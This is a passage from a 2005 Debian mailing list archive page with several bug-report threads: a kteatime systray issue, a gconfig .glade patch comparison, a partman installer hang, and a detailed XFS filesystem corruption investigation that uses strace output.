> > those lines.
> 
> Yes please -- that would be helpful.

I attached the strace. The last (similar) blocks are from switching
windows in fvwm2. 

> Also: can you please install kcpuload and let me know if that comes up
> inside a window on your system (this is another KDE systray applet)?

No. It detaches (contrary to kteatime) but does not open a window but
does seem to use CPU cycles (i.e., it seems to do something). 

Greetings

   Helge

-- 
Helge Kreutzmann, Dipl.-Phys.   [EMAIL PROTECTED]
   gpg signed mail preferred 
64bit GNU powered  http://www.itp.uni-hannover.de/~kreutzm
   Help keep free software "libre": http://www.freepatents.org/


kteatime_strace.bz2
Description: Binary data


pgp2OfgZx7Vl7.pgp
Description: PGP signature


Bug#292601: kernel: Updated .glade files

2005-02-03 Thread Joachim Nilsson
On Thu, Feb 03, 2005 at 11:20:42AM +0900, Horms wrote:
> On Mon, Jan 31, 2005 at 12:27:35PM +0100, Joachim Nilsson wrote:
> > Mon 2005-01-31 at 13:30 +0300 Simon Horman wrote:
> > > On Fri, Jan 28, 2005 at 04:41:31PM +0100, Joachim Nilsson wrote:
> > > > [1] - http://lists.debian.org/debian-kernel/2005/01/msg00171.html
> > > Is gconfig even maintained upstream?
> > Dunno, but 2.6.10-ac5 has the following changelog entry that might
> > be worth taking a closer look at:
> > * Make gconfig work with current gtk 2.4 (J Magallon)
> That is interesting indeed. I have attached the associated patch.
> Could you take a moment to see if it resolves the problem
> as well as your patch does.

The bk patch does solve the errors. It does this mainly by removing the
use of custom icons for single|split|full view and replacing them with
(imo badly chosen) stock icons. I.e., the patch focuses on solving the
runtime errors, the annoying warnings remain.

My patch otoh keep the original icons, the same as are used in the
xconfig/kconfig toolbar. I do this with replace_button_icon(), which is
a new function that replace missing icons from the .glade file.  On top
of that I also sneeked in a segfault fix on lines @@ -851,9 +851,12 @@
to grey out the back button in single mode.  It is necessary to handle
if the user changes from a deeply nested place in split mode to single
mode and then presses back.

I know I'm not exactly impartial here, but the bk patch is ugly.  Maybe
we should let our patch flow upstream?

Regards
 /Jocke



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293449: Bug partman

2005-02-03 Thread Anton Zinoviev
On Thu, Feb 03, 2005 at 03:15:47PM +0100, Stefan Haberl wrote:
> 
> The Module cciss loading successfully but Partman is not able to detect 
> the Harddrive. If i choose "back" the installer hangs completely.

Can you send us the files from /var/log? We need them in order to see
what happened.  Try to copy them to a floppy disk, to a mounted existing
partition or to a USB flash memory.

Anton Zinoviev




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292290: kernel-image-2.6.8-1-k7: XFS filesystem corruption: Input/output error

2005-02-03 Thread Loïc Minier
Hi,

 This is a followup for Debian bug .

Joost van Baal <[EMAIL PROTECTED]> - Wed, Jan 26, 2005:
>   `./lib/modules/2.6.10-1-k7/kernel/drivers/atm/zatm.ko': Unknown error 990
> I've heard of one other victim of this problem with this kernel.
Wessel Dankers <[EMAIL PROTECTED]> - Thu, Jan 27, 2005:
> I myself have been a victim of this too, so I thought I'd join in.

 Well, me too.

> - the kernel was Debian's 2.6.8;
> - the filesystem in question was XFS;
> - software raid1 (mirroring) was used.
> XFS complained about corrupted in-memory structures in some of the cases.
> However, it is very unlikely that all three machines have bad RAM, and
> memtest86+ reports no problems.

 I am also using Debian's kernel-image-2.6.8-2-686 in Version 2.6.8-13.

 First of all, I'm using a PIV, so this aint K7 specific.  I am NOT
 using RAID 1 nor LVM, pure XFS.

 This first corruption appeared with my "mail/debian-project/" folder,
 precisely on the "tmp/" subdirectory.  The second appeared today, on
 the ./usr/share/doc/texmf/help/Catalogue/entries/romannum.html:
 dpkg: error processing
 /var/cache/apt/archives/tetex-doc_2.0.2c-6_all.deb (--unpack):
  unable to stat
  `./usr/share/doc/texmf/help/Catalogue/entries/romannum.html' (which I
  was about to install): Unknown error 990

 This is a really serious XFS problem it seems.

 Trying to understand the problem suggested I tried stracing:
 bee% LC_ALL=C strace -f ls debian-project-fucked/tmp 2>&1
 ...
 rt_sigprocmask(SIG_UNBLOCK, [RTMIN], NULL, 8) = 0
 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) =
 0
 brk(0)  = 0x805b000
 brk(0x807c000)  = 0x807c000
 brk(0)  = 0x807c000
 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo
 ...}) = 0
 ioctl(1, TIOCGWINSZ, {ws_row=24, ws_col=80, ws_xpixel=644,
 ws_ypixel=388}) = 0
 stat64("debian-project-fucked/tmp", {st_mode=0, st_size=0, ...}) = -990
 write(2, "ls: ", 4ls: ) = 4
 write(2, "debian-project-fucked/tmp", 25debian-project-fucked/tmp) = 25
 write(2, ": Unknown error 990", 19: Unknown error 990) = 19
 write(2, "\n", 1
 )   = 1

 The problems seems to occur with the stat64() syscall, but I couldn't
 find out what error 990 is supposed to be in the /usr/include headers
 so I moved on to the kernel source and looked to the various syscalls
 implementations.  I also tried understanding what syscalls could
 trigger the problem:
   I checked with:
bee% LC_ALL=C strace zsh -e -c "cd debian-project-fucked/tmp; ls"
 and got the error with a chdir() too, and hence looked at sys_chdir().
   Then I checked whether this was directory specific, and tried:
 bee% LC_ALL=C strace -f ls -i \
 /usr/share/doc/texmf/help/Catalogue/entries/ 2>&1
 I got errors on a bunch of files, in the lstat64().

 Then I looked upstream, first at bugme.osdl.org, and found:
 http://bugme.osdl.org/show_bug.cgi?id=3224 (still open)

 Finally, I looked at SGI's bugzilla, and found a first bug bubble:
 http://oss.sgi.com/bugzilla/show_bug.cgi?id=197
 The problem also seems to appear in a comment of:
 http://oss.sgi.com/bugzilla/show_bug.cgi?id=383

 197 is really worth reading, and using MD / LVM devices seems to help
 trigger the bug.

 These are dups of the above:
 http://oss.sgi.com/bugzilla/show_bug.cgi?id=204
 http://oss.sgi.com/bugzilla/show_bug.cgi?id=207

 The final patch attached to the bug report is:
 http://oss.sgi.com/bugzilla/attachment.cgi?id=59&action=view

 I couldn't find an applied version in the kernel, it looked somehow too
 much different but the xfs_finish_reclaim_all() was there...

 2.6.8 was released in august 2004, and the patch mentionned dates
 january 2003, so I can only think we face a different bug.


 Then I went thoroughly through the bugzilla and found another bug which
 might be related:
 http://oss.sgi.com/bugzilla/show_bug.cgi?id=338 is on a 2.4 kernel


 When I found out error 990 means EFSCORRUPTED, I thought I wouldn't be
 able to track down the problem any further...

 So I'm about to get a fresh xfsprogs or a live CD and xfs_repair my FS
 to get a log and send it upstream.

   Regards,

-- 
Loïc Minier <[EMAIL PROTECTED]>
"Neutral President: I have no strong feelings one way or the other."




  1   2   3   4   >